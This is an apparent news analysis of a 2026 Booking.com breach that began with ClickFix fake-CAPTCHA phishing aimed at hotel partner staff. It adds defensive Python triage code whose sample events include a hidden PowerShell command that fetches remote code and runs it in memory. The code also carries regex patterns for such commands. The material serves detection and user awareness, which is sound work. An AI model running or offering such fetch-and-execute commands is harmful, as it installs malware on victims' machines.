On April 13, 2026, Booking.com began contacting customers with a message that has become a familiar shape in the post-breach communications landscape: unauthorized access had occurred, personal data associated with certain bookings had been viewed, and the company was taking steps to contain the situation.

Reservation PINs were reset. Customers were notified individually. Booking.com confirmed that financial information was not accessed. The company declined to answer questions about the total number of impacted users.

What makes this breach different from a standard credential-stuffing or direct-intrusion incident is where the attack began: not in Booking.com’s own systems, but in the network of its hotel partners — small and mid-size hospitality businesses that connect to Booking.com’s platform to manage reservations, and whose staff were targeted via a carefully constructed social engineering campaign that has been running, uninterrupted, since at least November 2024.

The ClickFix Technique That Opened the Door

The attack vector is a technique researchers call ClickFix. The basic mechanics are straightforward: a target receives a spoofed email appearing to come from a legitimate source — in this case, communications impersonating Booking.com’s own partner management notifications — and is directed to a page that displays a fake CAPTCHA verification prompt.

To complete the verification, the user is instructed to copy and paste a command into their system. That command executes a PowerShell script that downloads and installs a remote access trojan or information stealer. The victim believes they have completed a routine CAPTCHA check. They have actually handed the attacker persistent access to their machine.

Cofense, which tracks phishing infrastructure, had been monitoring this specific campaign against Booking.com hotel partners since November 2024. Microsoft’s Threat Intelligence team subsequently attributed the campaign to a criminal group tracked as Storm-1865 — a financially motivated actor with a documented history of targeting the hospitality sector. The malware deployed in the campaign included XWorm and VenomRAT, both well-documented remote access tools with keystroke logging and credential harvesting capabilities.

The campaign targeted hotel staff across North America, Oceania, South and Southeast Asia, and Europe. The geographic breadth was not accidental — it reflects the international footprint of Booking.com’s hotel partner network and the availability of targets across multiple time zones.

How Reservation Data Becomes a Weapon

The data exposed in this breach is not, by itself, financially sensitive in the way that payment card numbers or Social Security numbers are. There are no credit card numbers in the leaked dataset. Booking.com confirmed that financial information was not among the compromised records.

What was compromised is something more immediately useful for follow-on fraud: full names, email addresses, physical addresses, phone numbers, booking dates, hotel names, and extra notes or requests made to hotels. This is the data that makes a phishing message credible.

Researchers at Bridewell documented a three-stage infection chain — distinct from but related to the ClickFix technique — in which compromised hotel partner credentials were used to target Booking.com customers directly via WhatsApp. The messages combined fraudulent payment requests with accurate booking details: specific hotel names, exact dates, correct guest names. One user who posted their notification to Reddit told TechCrunch they had received exactly this kind of WhatsApp message two weeks prior to Booking.com’s breach notification.

That timeline matters. Customers received phishing messages using their real booking data before the breach was publicly disclosed. The attack was not theoretical. It was already in execution.

The more dangerous implication is the combination of data. An attacker who knows your name, your hotel, your check-in date, your phone number, and the specific requests you made to the property can construct a message that bypasses the intuitive fraud detection most people apply to unexpected communications. “Hi, this is the front desk at [your exact hotel]. Regarding your upcoming stay on [your exact dates]…” — that message does not trigger the same skepticism as a generic phishing attempt.

This Attack Was Predicted and Ignored

The Booking.com ClickFix campaign is not a new threat. Cofense documented it in November 2024. Microsoft published threat intelligence on Storm-1865 and its hospitality sector targeting before the breach. Bridewell’s research on the three-stage infection chain — which documented compromised hotel staff machines being used to contact Booking.com guests directly — was published in early 2026.

Booking.com itself had previously experienced a significant breach in 2023, in which threat actors used compromised hotel partner systems to access the platform’s internal messaging tools and send fraudulent payment requests to guests. The 2023 incident and the 2026 breach share the same underlying structural weakness: a large partner network of hospitality businesses with variable security maturity, connected to a central platform that handles sensitive guest data.

The ClickFix technique specifically exploits the gap between corporate security tooling and human behaviour. An endpoint detection and response tool may not flag a user manually executing a PowerShell command from a copied-and-pasted string — the execution looks like a user action, not malware behaviour, because it is a user action. The user initiated it. The social engineering convinced them to do so.

For organisations operating partner networks or B2B platform ecosystems, this is the central challenge: your security posture extends to every partner with access to your platform. A hotel running Booking.com’s extranet interface on an unmanaged laptop is part of your attack surface, whether or not you have any direct control over that device.

What the Breach Means for Booking.com Customers

If you received a breach notification from Booking.com, your reservation PIN has already been reset. That is the immediate technical remediation the company applied.

The more important concern is not your Booking.com account — it is the phishing messages that may follow. Attackers who obtained your booking data before the breach was disclosed have had weeks to use it. The messages they send will be specific. They will know your name, your hotel, your dates, and potentially the hotel-specific requests you made.

Treat any unexpected communication about your booking with heightened skepticism, regardless of how accurate the details are. Do not click payment links or enter card details in response to messages received via WhatsApp, email, or SMS — even if the details appear completely accurate. Contact the hotel directly using a phone number sourced independently to verify any payment-related requests.

What Hotel Operators and Hospitality Businesses Need to Do

The ClickFix campaign that enabled this breach targeted hotel staff, not Booking.com itself. The hospitality businesses whose staff machines were compromised by this campaign were the point of entry.

For hotel operators and property managers using Booking.com’s partner portal:

Recognise ClickFix as a current, active threat. The technique is not novel, but it remains effective because it exploits user behaviour rather than technical vulnerabilities. Staff who manage reservations on platforms like Booking.com’s extranet are a specific, documented target population. Security awareness training should cover this attack pattern by name, with examples of what the fake CAPTCHA pages look like.

Apply endpoint protection to any machine accessing hospitality management platforms. Managed detection and response tools configured to flag unusual PowerShell executions can interrupt the ClickFix infection chain. Unmanaged personal laptops used to access partner portals are a persistent risk.

Review access controls on partner portal accounts. Accounts with broad access to guest data — names, contact details, booking information — should be protected with hardware-based MFA where platform support exists. If the platform does not support hardware tokens, push-based MFA is a minimum.

Report suspicious emails immediately. A hotel that receives a ClickFix campaign email targeting its Booking.com login has the opportunity to interrupt the attack before account compromise occurs. Reporting mechanisms should be clear and frictionless for front-desk and reservations staff who are not security professionals.
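The recommendation above to flag unusual PowerShell executions is where a ClickFix infection is most detectable: a pasted command lands as an interpreter started from the Run dialog or a browser, with switches a reservations clerk never types. The following triage logic is an added example, not code from the original article or from any vendor named in it; the process-creation events, hostnames and URLs are constructed for illustration, and the field names and scoring thresholds are assumptions a team would tune to its own telemetry.

```python
import re

# Constructed sample of Windows process-creation events (Sysmon Event ID 1 fields,
# reduced to what the detection needs). Hosts, paths and URLs are made up.
SAMPLE_EVENTS = [
    {"host": "frontdesk-01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iwr http://captcha.example.invalid/v | iex"'},
    {"host": "frontdesk-02", "parent": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://verify.example.invalid/step.hta"},
    {"host": "admin-ws", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\rotate-logs.ps1"},
]

# A pasted ClickFix command is started by the user from the Run dialog (explorer.exe)
# or a browser, not by a scheduled task, an installer or an admin console window.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line traits that are rare in legitimate front-desk use but typical of the
# one-liner a fake CAPTCHA page tells the victim to paste.
TRAITS = [
    (re.compile(r"-(w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s", re.I), "encoded command"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "in-memory execution"),
    (re.compile(r"\b(iwr|invoke-webrequest|downloadstring)\b|https?://", re.I), "remote fetch"),
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(event):
    # Parent/child pairing is worth more than any single switch; switches add up.
    score, reasons = 0, []
    if basename(event["parent"]) in INTERACTIVE_PARENTS and basename(event["image"]) in INTERPRETERS:
        score, reasons = 2, ["interpreter launched from shell/browser"]
    for pattern, label in TRAITS:
        if pattern.search(event["cmdline"]):
            score += 1
            reasons.append(label)
    return score, reasons

def triage(events, threshold=3):
    # Events at or above the threshold become alerts; everything else stays quiet.
    scored = [(event, *score_event(event)) for event in events]
    return [{"host": e["host"], "score": s, "reasons": r} for e, s, r in scored if s >= threshold]
```

Run against the sample, the two front-desk events are alerted and the scheduled-script run on the admin workstation scores zero, which is the separation a hospitality EDR rule needs to avoid paging on routine administration.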

The Supply Chain Is Now the Attack Surface

The Booking.com breach is the latest in a sustained pattern of attacks that target platforms through their partner and vendor ecosystems rather than directly. We documented the same dynamic in our analysis of supply chain attacks as a cybersecurity vulnerability — the weakest link in a supply chain is rarely the primary organisation, because that organisation typically has more security resources than its partners.

For platforms with tens of thousands of hotel partners distributed globally, securing that partner network is not a problem that can be solved through Booking.com’s own infrastructure investments alone. It requires minimum security standards for partner access, active monitoring for anomalous access patterns originating from partner accounts, and rapid detection when partner-facing credentials have been compromised.

The 2023 incident suggested a structural problem. The 2026 breach confirms it.


Booking.com confirmed on April 13, 2026 that unauthorized third parties had accessed customer reservation data via compromised hotel partner accounts. The breach is attributed to a ClickFix social engineering campaign linked to threat group Storm-1865. The number of affected customers has not been disclosed.